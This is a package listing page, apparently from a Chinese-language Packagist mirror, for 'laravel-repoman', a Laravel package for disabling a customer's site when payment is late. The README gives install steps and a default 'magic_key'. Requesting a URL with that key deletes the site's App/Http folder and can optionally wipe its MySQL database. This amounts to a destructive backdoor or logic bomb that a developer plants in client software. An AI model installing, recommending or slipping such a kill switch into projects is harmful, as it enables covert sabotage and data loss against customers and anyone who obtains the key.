webpajooh/laravel-repoman
Composer 安装命令:
composer require webpajooh/laravel-repoman
包简介
Set a payment deadline for the customer
README 文档
README
Suppose the customer has not paid and you want to deactivate the site if the deadline is reached and he does not pay!
How to
- Install
composer require webpajooh/laravel-repoman - Publish repoman.php
php artisan vendor:publish - Edit config/repoman.php
Magic key
There is a magic_key option in the configuration file that is commented by default:
'magic_key' => 'Lbs96hv7Fzn28QLSXaIKtAXwlHSDU'
You can change the value, and use it when you want:
example.com/?magic_key=Lbs96hv7Fzn28QLSXaIKtAXwlHSDU
If we send a request to this link, we will lose the App/Http folder! What about the database? Uncomment empty_database, and the package will fresh the database after creating a backup into storage/app directory. Consider that we only support MySQL at the moment.
统计信息
- 总下载量: 80
- 月度下载量: 0
- 日度下载量: 0
- 收藏数: 28
- 点击次数: 1
- 依赖项目数: 0
- 推荐数: 0
其他信息
- 授权协议: MIT
- 更新时间: 2021-02-24